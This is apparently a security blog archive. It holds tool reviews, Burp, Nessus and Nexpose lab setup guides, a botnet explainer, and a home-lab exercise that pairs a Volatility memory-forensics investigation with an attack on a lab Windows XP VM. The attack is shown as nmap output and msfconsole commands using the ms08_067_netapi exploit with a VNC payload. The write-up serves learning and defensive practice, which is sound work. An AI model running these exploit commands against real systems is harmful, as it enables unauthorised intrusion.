Category Archives: Info Security

BlackLight Forensics Software

BlackBag BlackLight

I had no idea just how tightly BlackLight would grab onto my attention and then keep its hold. Yet, here I am. While I had heard positive feedback from people in the information security community regarding BlackBag’s forensic software products, I had never had the opportunity to use one of their products myself. Thus, I was thrilled to review BlackBag’s BlackLight product.

For those who are not familiar, BlackBag’s BlackLight is comprehensive forensic analysis software that supports all major platforms, including Windows, Android, iPhone, iPad, and Mac. In addition to analysis, it can logically acquire Android and iPhone/iPad devices. You can run the software itself on both Windows and Mac OS X.

In this particular review, I used the latest version of BlackLight (2016 release 3). I decided to run it on a Mac. The main reason I chose the Mac was that most of the analysis I have performed thus far has been on a traditional Windows Forensic Recovery of Evidence Device (FRED), and I figured this would be a great opportunity to try something different.

Installing BlackLight on Mac was a breeze. I simply downloaded the installation file from BlackBag’s website and entered the license key upon initial file execution. The single installation file took care of all of the dependencies needed for the software, which I was glad to see.

BlackLight Actionable Intel

My test machine was a MacBook Pro running macOS Sierra 10.12.2, with a 2.5 GHz Intel Core i7, 16 GB of memory, and a standard hard disk drive.

For this review, I wanted to build a use case in which I would perform basic processing and analysis of a traditional disk image using BlackLight on the Mac. Without any real experience with BlackLight, I focused on usability and intuitiveness.


For this review, I used a 15 GB physical image (E01) of a Windows XP SP3 disk. I processed this image through BlackLight with all of the ingestion options available in the software and, to my surprise, it took under 10 minutes to complete.

What was even more impressive was that it had very little performance impact on my system. In fact, as the image was being processed in the background, I continued to perform normal operations such as browsing the web and using Open Office with no problem. Continue reading by clicking here!


Advanced Forensic Toolkit (FTK) Course Review

For a few years, I had been using AccessData’s FTK (Forensic Toolkit) software without any formal training. I had managed to work my way through the fundamentals on my own, but I always sensed that there was much I was missing out on.


FTK Email Analysis Visualization

It was only after I recently attended the Advanced FTK class offered by AccessData (Syntricate) that I realized how much had been right under my nose the whole time.

You can read my complete review of this course at Forensic Focus or by clicking here.


Burp and Samurai-Web Testing Framework

The other day I came across a social media post that was about utilizing Burp Suite to identify vulnerabilities in web applications. I had heard of Burp before but never really had the chance to play around with it – until now.

Just like a lot of other security tools, Burp has a community version along with its commercial product. I decided to download the free edition from here into my home lab. The installation process is straightforward, and in no time you have Burp up and running. Here is what the initial interface looks like:


Right when I finished my installation of Burp, I realized that I did not have a web application running in my lab that I could test Burp against. Bummer! Now I had to decide between setting up a web server myself or finding a pre-packaged distribution that came with one built in. This was a no-brainer – within minutes I found a few distributions designed for testing and learning web application security, such as SamuraiWTF, WebGoat and the Kali web application metapackages. I decided to go with SamuraiWTF.

SamuraiWTF gives you the option to run from a live disk or install it in a VM. I decided to install the VM. Here is a good guide on the installation process. I gave my VM instance 4 GB of RAM and 3 cores; more than enough horsepower.

This distribution comes pre-installed with Mutillidae, which is a “free, open source, deliberately vulnerable web-application providing a target for web-security enthusiasts”. This was perfect for what I was looking for. Setting up Mutillidae is pretty simple – all I had to do was change my network configuration to NAT and that was it. However, if you need more information on configuration, here are some great video guides on Mutillidae; in fact, I used some of these myself while configuring Burp to work with Mutillidae.

After finishing all of the above prep work, I was ready to run Burp!

For those who are not familiar with Burp, it is an intercepting proxy that sits between your browser and the web server; by doing so, it is able to intercept requests/responses and gives you the ability to manipulate their content. To use it, you have to configure Burp as your proxy. On your VM, this would be your localhost (Proxy tab > Options):
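The same proxy settings apply to scripted traffic, not just the browser. Here is a minimal sketch of my own (not from the original post) of pointing Python’s `requests` library at Burp’s listener; the host/port values assume an unmodified default listener at 127.0.0.1:8080.

```python
# Sketch: route scripted HTTP traffic through Burp's proxy listener.
# Assumes Burp's default listener at 127.0.0.1:8080 (Proxy > Options).

def burp_proxies(host="127.0.0.1", port=8080):
    """Build the proxies mapping that the `requests` library expects."""
    listener = f"http://{host}:{port}"
    return {"http": listener, "https": listener}

# With Burp running (and Intercept off so traffic flows through):
#   import requests
#   r = requests.get("http://target.lab/mutillidae/", proxies=burp_proxies(),
#                    verify=False)  # Burp re-signs TLS, so skip cert checks

print(burp_proxies())
```

The `target.lab` hostname above is a placeholder for whatever IP your SamuraiWTF VM received.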


Likewise, you would have to configure your browser to that same proxy. Here is my proxy configuration on Firefox:

Firefox Proxy Configuration

Now as you navigate through your Mutillidae web page, all your requests should go through Burp. One thing you have to do is turn on the Intercept option in Burp. It’s under Proxy > Intercept.

What this allows you to do is see the request as it is made, but gives you the control to either forward it to the web server or simply drop the request (like a typical MiTM). For example, on the login page of Mutillidae I used the username admin and the password admin123. As soon as I hit “Login”, I saw the request being made from my browser to the web server in Burp:

Burp Intercept

In the screenshot above, you can see the two options: Forward and Drop. If you hit Forward, the web server will receive this request from your browser and will respond as it normally would. In this case, the account I used to log in did not exist:

Web Server Response

Burp also has the capability to capture responses. It is an option that you can turn on by going to Proxy > Options; towards the middle of the page you will see “Intercept Server Responses”. By turning this on, you will be able to see and control both sides of the conversation:

Request and Response

If you look under Target > Site Map, on the left pane you will see a list of all the sites that you have visited with the Burp proxy on:

History Map

One advantage of the above feature is that it allows you to go back and revisit requests and responses. The sites shown in grey are those that are available on the target web page but that you have not visited yet.

Another neat feature is that if you do not want to visit each page individually, you can run the “Spider” feature, which will map the whole target site for you.


If you go under Spider > Control you are able to see the status of the Spider as it runs:

Spider Status

When you intercept a request or response, you have the ability to send it to other features of Burp. You can view these additional options by right-clicking on the intercept:

Intercept Additional Options

Towards the bottom of the official Burp Suite guide page here, you can see a brief description of most of the options shown in the screenshot above. The one I found really neat is the “Repeater” option, which allows you to modify and re-transmit requests repeatedly without needing to perform a new intercept each time.

This concludes my brief journey of getting started with Burp using SamuraiWTF. There is a whole lot more that I did not have the chance to explore, but here is a great reference for advanced topics.

Below is a quick blurb on some of Burp’s features:

Spider: crawls the target and saves the numerous webpages that are on the target.

Intruder: automated attack feature which tries to automagically determine which parameters can be targeted, e.g. for fuzzing.

Fuzzing options: Sniper (fuzz each position one-by-one), Battering Ram (all positions on the target receive the same single payload), Pitchfork (each target position is fuzzed in parallel), Cluster Bomb (iterates through every combination of payloads across multiple positions).

Proxy: used to capture requests & responses to either just monitor or manipulate and replay.

Scope: controls what (pages, sites) is in/out of the test “scope”.

Repeater: manually resubmit requests/responses; allows modification.

Sequencer: used to detect predictability of session tokens using various built-in tests, e.g. FIPS 140-2 tests.

Decoder: allows encoding/decoding of the target data, e.g. Base64, hex, gzip, ASCII.

Comparer: allows side-by-side analysis between two requests/responses.
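The four Intruder attack types above differ only in how payloads are slotted into the marked positions. As a rough illustration of my own (made-up positions and payload lists, not Burp code), they map onto familiar iteration patterns:

```python
# A rough sketch of how Burp Intruder's four attack types place payloads
# into marked positions. Positions and payload sets here are illustrative.
from itertools import product

def sniper(baseline, payloads):
    """One payload set; fuzz each position one-by-one, others at baseline."""
    for i in range(len(baseline)):
        for p in payloads:
            out = list(baseline)
            out[i] = p
            yield tuple(out)

def battering_ram(baseline, payloads):
    """The same single payload inserted into every position at once."""
    for p in payloads:
        yield tuple(p for _ in baseline)

def pitchfork(payload_sets):
    """One payload set per position, stepped through in parallel (zip)."""
    yield from zip(*payload_sets)

def cluster_bomb(payload_sets):
    """Every combination of payloads across all positions (product)."""
    yield from product(*payload_sets)

base = ("user", "pass")          # two marked positions in a login request
words = ["admin", "guest"]
print(list(sniper(base, words)))                         # 4 requests
print(list(cluster_bomb([words, ["123", "letmein"]])))   # 4 combinations
```

This is why Cluster Bomb request counts explode quickly: the total is the product of the payload list sizes, while Pitchfork is bounded by the shortest list.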




How does it feel to know that your personal computer can be remotely controlled by someone, without your knowledge, for ill purposes? Or worse, instead of a single individual having this unauthorized access to your system, it could be a group of people on the internet controlling what your computer does and how it does it. In the field of information security, if your system is under such control, it is considered a bot: a computer system being controlled by an automated malicious program. In addition, your computer can be part of a larger group of infected systems; these collections of infected computers are called botnets. Casually, these bots are also referred to as zombies, and the remote controller is called the botmaster. So how are these bots born, and how do they grow into botnets?

According to the annual threat report of Damballa, an independent security firm, “at its peak in 2010, the total number of unique botnet victims grew by 654 percent, with an average incremental growth of 8 percent per week”. These bots are developed by tech-savvy criminals who write the malicious bot code and then usually release it on the open internet. Once on the internet, the bot can perform numerous malicious functions based on its design, but in most cases it spreads itself by searching for vulnerable, unprotected computers to infect. After compromising a victim’s computer, a bot quickly hides its presence in difficult-to-find locations, such as the computer’s operating system files. The botmaster’s goal here is to keep the compromised system behaving as normally as possible so the victim does not become suspicious. Common activities that bots perform at this stage include registering themselves as a trusted program with any anti-virus software that might be on the victim’s computer. Moreover, to maintain persistence, bots add their operations to the system’s startup routines, which results in the bots automatically reactivating even after a shutdown or restart. Throughout this process, bots continue to report back to the botmaster and wait for further instructions.

Below are some of the common operations that bots can perform on behalf of their botmaster:

– Launching denial of service (DoS) attacks against a specified target. Cybercriminals extort money from web site owners in exchange for regaining control of the compromised sites.
– Sending spam, viruses and spyware.
– Stealing personal and private information and communicating it back to the malicious user: credit card numbers, bank credentials and other sensitive personal information.
– Boosting web advertising billings by automatically clicking on internet ads (click fraud).

As the list above shows, there are numerous functions that bots can perform. However, recently bots have mainly been used to conduct Distributed Denial of Service (DDoS) attacks: utilizing hundreds or thousands of bots from around the whole world against a single target. The botmaster’s goal with DDoS is to use thousands of bots across numerous botnets to attempt to access the same resource simultaneously. This overwhelms the resource with thousands of requests per second, thus making the resource unreachable. This inaccessibility has severe effects on legitimate users and requests. According to the FBI, “botnet attacks have resulted in the overall loss of millions of dollars from financial institutions and other major U.S. businesses. They’ve also affected universities, hospitals, defense contractors, law enforcement, and all levels of government”.

A misconception exists that if your system does not hold any valuable information, or if you do not use it to conduct online financial transactions, then an adversary is less likely to target it. Unfortunately, as much as we would like this to be true, it is not the case. For botnets, the most valuable elements are your system’s storage and your internet speed. Our personal computers are now capable of storing and processing terabytes of information seamlessly, and can use our high-speed internet connections to transfer that information. As stated by a malware research team from Dell SecureWorks, a botnet “allows a single person or a group to leverage the power of lots of computers and lots of bandwidth that they wouldn’t be able to afford on their own”.



Nexpose Scanner – Quick Setup

My last blog post was about setting up the Nessus home edition scanner in your lab to do testing. Nessus is probably what I am most familiar with, and I like it. I also have some experience using the Qualys scanner, but it has been a couple of years since I used it. However, the scanning technology that I had only heard of but never actually used is Nexpose. So for that reason, I figured I’d give it a try.

Similar to other commercial scanning technologies, there is a community edition of Nexpose that you can download for testing in your home lab from here.

They have a pretty straightforward user/installation guide here, which I followed for my installation. But just in case, here is a high-level overview of how I did my setup.

  • Selected the VMware Virtual Appliance option of the Community Edition
    • Completed the online form and received the activation code by email
    • The download is a 1.02 GB .ova file called NexposeVA.ova
  • I opened that file using VMware Workstation
    • Please note that by default it allocates 8 GB of memory, 2 processors and 160 GB of disk space. So please modify these settings before you power on the VM if you do not have those resources available.
  • After the VM completely boots, log in using the following credentials: login: nexpose password: nexpose (please change this)
    • If you just want to complete the most basic setup and get up and running immediately, without messing with any of the advanced configurations or upgrades, the only configuration you need to do is networking. The virtual appliance is set up in bridged mode by default and should get an IP automatically. But if you need to give it a static IP, you will have to do that manually.
  • At this point you are pretty much done with the setup. You will be able to complete the rest of it by accessing your Nexpose instance in your browser at: https://[VM-IP-Address]:3780
    • The default username for the web interface is nxadmin and the password is nxpassword
    • After your first logon, the initialization process will take some time. For me, it was about 5-7 minutes.

Login Page

  • Like I said earlier, this was my first time using Nexpose, so I did not know the exact steps to follow after logging in. But my goal was to run a couple of different scans against all of my lab machines (14 active IPs). So, without reading the user guide and only spending some time familiarizing myself with the interface, the following is the approach I took to set up my scans.
  • Create a “New Static Site”
    • To me, this is similar to the Organization in Nessus (SecurityCenter)
    • Assets: here you provide the name of your site, list all of the IPs (assets) that are part of this site. I added my 14 IPs here.
    • Scan Setup: this is where you choose the type of scan. I personally did not like the scan setup option being part of the Site Configuration, because each time you need to run a different type of scan, it seems like you need to go and edit the site.
    • Credentials: in the next tab you can provide credentials. I like how it gives you the option to restrict each credential to a specific IP.
    • Web Application: next, there is an option for doing authenticated scans against a web application target. I did not explore this, since I don’t have a test web application, yet.
    • Organization and Access: these two seem optional: Organization information and the ability to restrict access to this site to selected users.

Site Configuration

  • At this point you are ready to kick off your scan. Simply go back to your home page and find the “Scan Now” option towards the middle of the page. A new window will come up; notice that you have the option to change the Site, if you have multiple sites. By default, the site that you created in the previous step should be selected, and you should see all of your assets (IPs) listed. If you want to run the scan against all of those assets, kick it off by clicking “Start Now”; if you want to exclude some IPs, or run it against only a specific IP, you can do that on this same screen.

Start New Scan

  • In the next screen you will be able to see the scan progress in real time.

Scan Progress

  • You will be able to see the scan results right after the scan completes. The scan results seen below are from a non-credentialed, exhaustive scan against my lab machines.

Scan Results

  • The screenshot below shows the Vulnerabilities tab of the web interface. You will notice the two columns that indicate whether malware and exploits are present, right before the CVSS and Risk columns. This feature is different from Nessus, but I like it. I think the commercial version of Nexpose lets you take this to the next step and actually run an exploit.


  • The last feature that I wanted to explore was reporting. By default, there are several report templates that are available for you to select from:

All Report Templates

  • By simply selecting the template that you want from the above, you can choose the file format (PDF, XML, Excel), the scope (individual scan, assets, or filters) and lastly the report frequency.
  • Here is a sample report from my lab asset group:

Sample Report

This concludes the basic, quick deployment and walk-through of Nexpose. By using the virtual appliance option, the deployment is almost effortless. And even after the deployment, setting up assets and kicking off basic scans from templates is straightforward. I will continue to use it on my lab machines, and will share anything new I discover that is worth sharing with new users!


Nessus Scanner – Quick Setup

Unfortunately, after my last CDR post – for some unrelated reason – my main lab system crashed, and now I have to rebuild most of the different lab machines that I had before. Obviously this is a little frustrating, because I had everything set up the way I wanted it and now I pretty much have to start from scratch. But to make this rebuilding process a little more pleasant and productive, I am going to document and share some of the labs that I build. Most of these are going to be pretty simple to set up using VMware Workstation. I am not going to go over setting up VMware Workstation itself, since there are already a ton of YouTube videos on it.

First, we are going to select the platform that we will use for most of these machines – our choice: Ubuntu 13 Desktop.

The first tool that we are going to install is the Nessus vulnerability scanner. In the first CDR project, we used Nessus as one of our reconnaissance tools along with Nmap. However, this tool can also be used in just your lab or home network for identifying vulnerabilities in your systems.

We are going to install the latest version of Nessus, v6 Home – as of this post. For the operating system, we will choose “Ubuntu 11.10, 12.04, 12.10, 13.04, 13.10, and 14.04 AMD64” and download the .deb package.

Here is the sequence of commands after you have downloaded the package and opened the appropriate download directory in the terminal.

Nessus Installation

We are pretty much done. The only thing you need to check is whether the Nessus service is running. Usually it starts automatically, but you can verify by running: service nessusd status. If the output shows stopped, then simply run the following to start it: service nessusd start.
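Besides checking the service, you can confirm that the web UI port is actually listening before opening the browser. Here is a small sketch of my own (not from Tenable’s documentation) using a plain TCP connect against Nessus’s default port 8834:

```python
# Sketch: verify the Nessus web UI is reachable. Nessus listens on
# TCP 8834 by default; change the port if you reconfigured it.
import socket

def nessus_url(ip, port=8834):
    """Build the browser URL for the scanner's web interface."""
    return f"https://{ip}:{port}"

def port_open(host, port=8834, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

print(nessus_url("127.0.0.1"))  # https://127.0.0.1:8834
```

If `port_open` returns False right after starting the service, give the daemon a minute; it compiles plugins before the web server comes up.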

After the above, open your browser and go to your IP on port 8834. You can find your IP address by running ifconfig in your terminal. My IP address on this machine is:



You should get a similar page as above. Follow through the prompt and in couple screens you will have the option to create an initial account for your Nessus scanner. After that you will need to provide Plugin Feed Registration. For home use you can request the activation code by completing the following:

After completing all the steps thus far, you are done installing your Nessus scanner. Now you need to configure your scans. Following are the basic steps to configure a scan:

New Scan > Basic Network Scan > [Complete the General page with the name of the scan and the target IPs]. On the left side you have additional scan options that you can play around with. After you are done making your selections, simply hit Save and your scan will automatically start. The scan duration depends on the number of IPs that you are scanning and whether the scans are credentialed or non-credentialed.

After your scan completes, you will be able to see the scan results and drill down on each host to see the details of the findings. Later, you can also run reports against previously run scans.

This is pretty much all you need to do for the basic setup. Feel free to run more scans, and try running credentialed scans, as they provide the most comprehensive vulnerability information and are also the least intrusive on your target systems.

Until next time!



Response – Case 001-02

Continuation of case 001-01


We already know that our Windows XP machine is compromised, so we will proceed with collecting the memory of the system. In addition, we will run some Sysinternals tools to confirm the network communication to the malicious IP and determine the process that was involved in this communication.

To accomplish this task, I used a batch script that I wrote some time back, which utilizes a number of Sysinternals tools in conjunction with a raw memory dump tool. As a result, we were not only able to collect a raw memory dump of the target machine, but we also got access to volatile data that can be quickly analysed.

First, we will take a look at the volatile (Sysinternals) data:

From the response side, the only solid piece of information that we can use to pivot our analysis from is the connection from our compromised machine (Windows XP @ to the malicious host (Metasploit @ If you recall, we got this information from the numerous IDS alerts that we received during the Detection step. So based on this, the first volatile data that we will look at is the active connections on our compromised machine.

Active Connections

The active connections information above not only further confirms that our XP system is compromised, but it also gives us our second pivot point – process ID 1128.

The next thing to find out is the process name associated with PID 1128, so we pull the process list of our host:

Process List Tree

According to the above, PID 1128 is another instance of SVCHOST.EXE, and what is even more interesting is that this process is the parent of two additional processes: PID 1808 WSCNTFY.EXE and PID 2024 WUAUCLT.EXE.

Pretty quickly we have been able to identify key information just from reviewing the output of our Sysinternals tools. Now we’ll get into analyzing the memory dump of our system.

Volatility is what we will use to perform analysis of our system’s memory. First, I want to see if there are any additional processes whose parent is PID 1128 SVCHOST.EXE. And in fact, by running the pstree plugin, we see that a CMD.EXE process also points back to PID 1128. In addition, we see that our suspicious PID 1128 was spawned by PID 724 SERVICES.EXE.

Volatility Process Scan

The above pstree output is particularly interesting, because when we initially reviewed the output of our Sysinternals tools, we only saw two sub-processes of PID 1128; there was one more, which was missed by our Sysinternals tool. Similarly, we now want to use Volatility’s connscan plugin to identify all the connections to and from our malicious IP.

Volatility TCP Connections

We now see that there were a total of six network connections communicating with our malicious IP. The good thing is that they were all associated with the same PID. So it seems like all the evil on our machine is related to PID 1128 and its sub-processes: PID 1808, PID 2024 and PID 1768. It would be safe to assume that code was injected into the PID 1128 SVCHOST.EXE process by our bad guy, which then executed the other malicious processes; we can quickly confirm this:

Volatility Code Injection

Volatility’s malfind plugin confirms that PID 1128 contains a header that looks to belong to a Microsoft Portable Executable file – thus confirming an injected memory section.
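On larger cases, output like connscan’s is worth triaging programmatically rather than by eye. Below is a hedged sketch of my own that groups connection rows by owning PID; the sample rows and IP addresses are invented for illustration (the real case IPs are redacted above), and port 4444 is simply a common Metasploit handler default, not a confirmed case detail.

```python
# Sketch: group Volatility connscan-style rows by owning PID.
# Sample rows are made up for illustration, not taken from the case image.
from collections import defaultdict

SAMPLE = """\
Offset(P)  Local-Address  Remote-Address  Pid
0x0211a850 10.0.0.5:1038  10.0.0.99:4444  1128
0x0211c008 10.0.0.5:1040  10.0.0.99:4444  1128
0x02120d78 10.0.0.5:1041  10.0.0.99:4444  1128
"""

def connections_by_pid(text, remote_ip):
    """Map PID -> list of local endpoints that talked to remote_ip."""
    hits = defaultdict(list)
    for line in text.splitlines()[1:]:      # skip the header row
        _offset, local, remote, pid = line.split()
        if remote.startswith(remote_ip + ":"):
            hits[int(pid)].append(local)
    return dict(hits)

print(connections_by_pid(SAMPLE, "10.0.0.99"))
# {1128: ['10.0.0.5:1038', '10.0.0.5:1040', '10.0.0.5:1041']}
```

A single-PID result like this one is exactly the pattern seen in the case: every connection to the attacker hanging off one injected process.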

Now we are going to look further into the sub-processes by dumping out every memory section that belongs to them and performing a reputation check. First, we’ll take a hash of each process and check the VirusTotal online database to see if any data on these processes already exists.


No existing data on this process. After uploading the executable, we received a low detection ratio; analysis results.


No existing data on this process. After uploading the executable, we also received a low detection ratio; analysis results.


No existing data on this process; did not upload the process for further analysis.

Based on the above results, it would be safe to say that malicious software was not delivered onto our machine. (This is true, because if you go back and check Compromise stages 1 & 2, we did not deliver any malicious content onto our target.)

So if malicious software was not delivered, then what happened? To answer this, we will use our system’s disk image and create a system timeline. But before we do that, we will try to catch any “low-hanging fruit”.

The first thing we did was mount the target system’s image in read-only mode and scan it using a couple of anti-virus products. In this case, our results came back clean. But if they had come back with any findings, those could have been our next lead in the process.

The second thing that I would normally do is “malware footprinting” – this is when you have a piece of suspicious code and you want to see what it does when it is executed. From this you are able to collect your indicators of compromise (IOCs) and search the rest of your environment for those IOCs. Unfortunately, in this case we have not found any malicious code, so we cannot do this.

However, even though we did not identify any malicious program, we did review the persistence mechanisms by looking at the results of our Autoruns run; the output can be found here. The output does not indicate evidence of persistence.

Next up, prefetch. The prefetch analysis of our compromised system also did not provide any additional leads. The primary reason is that the majority of the prefetch entries consisted of the Sysinternals tools (without even reaching the 128-entry limit) that we ran during the acquisition step – and were thus deemed useless. A copy of the prefetch report is here.
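Eyeballing the Prefetch folder gets tedious, so a small helper can order the .pf entries by last-modified time. This is my own sketch (the directory is a parameter so it works against a mounted image as well as a live C:\Windows\Prefetch):

```python
# Sketch: list prefetch (.pf) files newest-first. XP caps the Prefetch
# folder at 128 entries; pass the folder path from a mounted image or a
# live system (e.g. C:\Windows\Prefetch).
import os

def prefetch_entries(prefetch_dir):
    """Return (filename, mtime) pairs for .pf files, newest first."""
    entries = [
        (e.name, e.stat().st_mtime)
        for e in os.scandir(prefetch_dir)
        if e.is_file() and e.name.lower().endswith(".pf")
    ]
    return sorted(entries, key=lambda pair: pair[1], reverse=True)
```

Note this only reads filesystem timestamps; parsing run counts and last-run times out of the .pf format itself is a job for a dedicated prefetch parser.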

Lastly, we look at the system’s overall timeline. The timeline also does not jump out with any significant information in terms of how the compromise actually took place. Using just the intelligence that we collected from our memory analysis (src/dst IPs, processes), we did not find any further information that would help us put together the picture of what happened.

On the other hand, when we search for the Important.txt file that we created and later copied out, there are quite a lot of entries about this file:

time type description
17:59:10 Created C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
17:59:18 $SI […B] time /Documents and Settings/Administrator/Recent/Important.txt.lnk
18:00:17 Modified C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
18:03:51 Access C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
18:03:54 Last Visited/Last Visited visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt.txt
18:03:54 $SI [MAC.] time /Documents and Settings/Administrator/Recent/Important.txt.lnk
18:03:54 Last Access/Last Access visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt.txt
18:04:01 Modified C:/Documents and Settings/Administrator/My Documents/Important.txt
18:04:01 $SI […B] time /Documents and Settings/Administrator/My Documents/Important.txt
18:04:01 Created C:/Documents and Settings/Administrator/My Documents/Important.txt
18:04:06 File deleted DELETED C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
18:06:19 Access C:/Documents and Settings/Administrator/My Documents/Important.txt
18:06:19 Last Visited/Last Visited visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt
18:06:19 File opened Recently opened file of extension: .txt – value: Important.txt
18:06:19 Last Access/Last Access visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt
18:06:47 $SI [M.C.] time /Documents and Settings/Administrator/My Documents/Important.txt
18:46:47 $SI [.A..] time /Documents and Settings/Administrator/My Documents/Important.txt

The above events clearly indicate the creation of our Important.txt file, and the subsequent events show it being accessed; however, I am not exactly sure why it shows the file getting deleted at 18:04:06, because we did not delete the file – we just copied it.
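Rows like these usually come out of a much larger supertimeline, so filtering by filename is worth automating. A small sketch of my own (sample rows abbreviated from the table above, following its "time type description" layout):

```python
# Sketch: pull every timeline row that mentions a file of interest.
# Rows follow the "time type description" layout used above.

TIMELINE = [
    "17:59:10 Created C:/Documents and Settings/Administrator/My Documents/Important.txt.txt",
    "18:03:51 Access C:/Documents and Settings/Administrator/My Documents/Important.txt.txt",
    "18:04:06 File deleted DELETED C:/Documents and Settings/Administrator/My Documents/Important.txt.txt",
    "18:05:12 Access C:/WINDOWS/system32/cmd.exe",
]

def rows_mentioning(rows, filename):
    """Case-insensitive substring match against each timeline row."""
    needle = filename.lower()
    return [row for row in rows if needle in row.lower()]

for row in rows_mentioning(TIMELINE, "important.txt"):
    print(row)
```

The same helper works line-by-line over a full log2timeline/mactime export without loading it all into memory, if you swap the list for a file handle.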

So with the above, we still have several questions unanswered. However, by the end of our analysis, we do know that our system was in fact communicating with the malicious host, and several active/inactive connections were found to confirm this finding. In addition, we know that the compromise took place in a very short period of time, in which there does not seem to be any evidence of malicious code being delivered, installed or executed. Based on the system’s web and removable device analysis, we can confirm that the compromise did not take place via these areas. Lastly, we know that during the short timeframe of the compromise, the Important.txt file was created (because we did that during the Compromise stage) and accessed numerous times. And while we do not have any further information to confirm that this file was accessed (or copied out) by the malicious source, it would be reasonable to assume that whatever was contained in that txt file is potentially compromised.

Case Conclusion

There are a couple of things I would like to mention as we close out our first case. First, I would like to go over a few disclaimers about how this case was set up.

The target XP host and our attacker machine were on the same network, with no security measures in place (other than the passive IDS). The XP host had its firewall off and no anti-virus installed. This is one of the reasons why we do not have a lot of evidence, from the response stage, about what took place in this compromise. I was able to extract the XP local event logs; however, probably due to some corruption, I was unable to open them for analysis.

Secondly, I believe that if we had had packet capture capability (or even just netflow) set up during this lab, we would have been able to confidently determine that the Important.txt file was in fact copied out from our XP machine; I plan to add this capability down the road.

The third point I want to add here is related to the Sysinternals batch script that we used during the initial Response stage. Even though the script's output provided us with useful information very early in the Response stage, as we got closer to system file and timeline analysis we noticed that a lot of our results were polluted by our Sysinternals tool executions. An overall lesson learned here.

Lastly, the goal of this exercise was to do a complete cycle of Compromise and Response without carrying knowledge over between the stages. For that reason, I did not look into how our selected Metasploit payloads operate and how they copy files over. Unless our Response artifacts indicated the usage of those payloads (or even Metasploit), it would have been cheating to use that information during Response.

With that said, I am sure that I overlooked artifacts during my analysis which could have been game-changers. And this is the whole point of these exercises: for me to do my best and then let others review what I have done and provide feedback on what I could do better. For this reason, I will be more than happy to share the case images with anyone who wants to take another stab at it. Just send me a message using the form on the contact page and I will share the download link. Thanks!


Compromise, Detect, Respond – Project Kickoff – 001-01

I am sure that most of you have heard that in order to be good at any one specific security domain you need to have a solid understanding of the opposite domain as well. This is especially true between the good guys and the bad guys. You cannot be a great responder if you do not understand some of the basic techniques the bad guys are using to break into your environment. Similarly, in order to successfully penetrate and maintain persistence in your target environment, you need to understand how forensicators track your movements.

Like many of you, I have heard this concept at many presentations and conferences. And like many of you, I have wondered how to best accomplish this myself. I, for one, am not an expert in any specific domain, so just catching up on the opposite domain would actually require doing both sides, good and bad. With this exact idea in mind, I am kicking off what I hope is going to be a series of posts that will encompass the complete cycle: compromise -> detect -> respond (CDR).

Now, like I said in the beginning, I do not specialize in any particular domain, but what I am hoping to get out of this project is not just a better but a holistic understanding of the core domains that make up infosec. So with this in mind, here is my setup.

I have set up three different environments with the basic, free tools that will help me with each of the CDR stages:

Compromise – Metasploit, Armitage, Nessus, SET
Detect – EXE Radar Pro (trial), different A/Vs, Snorby IDS (Thanks to dfinf2 for showing me the ropes on setting this up initially. I had to re-purpose this, but down the road I plan to expand the IDS capability.)
Respond – SIFT, Redline, Splunk

In addition to the above tool repository, each environment has a diverse group of vulnerable machines that will be used as targets.

The last thing I want to cover before the official kickoff is that during this whole process my goal will be to go through all three of the CDR stages as quickly as possible with the least amount of effort. The idea behind this is that in the real world there isn't a lot of time to get answers; typically you have a short period of time to get as much done as possible, so that is what I plan on doing with these exercises. In addition, I will not be documenting each of the steps that I take. There are more than enough online guides that walk you through, for example, how to use Metasploit against a specific target, so there isn't much point in me duplicating that work. In fact, during these exercises I plan to use those same guides, since I don't necessarily know how to use Metasploit myself :)

With that, I think I have covered all the overview topics that I wanted to cover. As environments, tools and other things change, I will mention them in future posts. And now it's time to kick off our first CDR – and what better way to kick off than using XP as your target!


case: 001-01

Target: WinXPProSP2 @

I started with a basic nmap reconnaissance scan to see what I had open on the target machine.

Nmap scan report for
Host is up (0.00040s latency).
Not shown: 997 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:91:68:A0
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop

The nmap report above shows only three TCP ports open on our target system. But it does confirm the OS of the system and the network connectivity. The next thing I did was spend some time searching online for XP Metasploit exploits that I could use in this exercise. In no time I had a few exploits that would give me remote access to the target system.
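Port lists like the one above can also be pulled out of an nmap report mechanically, which is handy when you scan more than one target. A small sketch, assuming nmap's normal text output format as shown above:

```python
import re

# Matches lines like "135/tcp open msrpc" from nmap's normal output
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")

def open_ports(report):
    """Extract (port, proto, service) tuples from an nmap text report."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3)))
    return ports

report = """\
Host is up (0.00040s latency).
Not shown: 997 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
"""
print(open_ports(report))
# → [(135, 'tcp', 'msrpc'), (139, 'tcp', 'netbios-ssn'), (445, 'tcp', 'microsoft-ds')]
```

For anything beyond a quick sketch, nmap's XML output (`-oX`) is a more robust thing to parse than the human-readable report.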

Here is the first one:

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

And now the payload – nothing like the VNC Inject for the first exercise!

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhot
rhot =>
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > check

[*] Verifying vulnerable status… (path: 0x0000005a)
[+] The target is vulnerable.
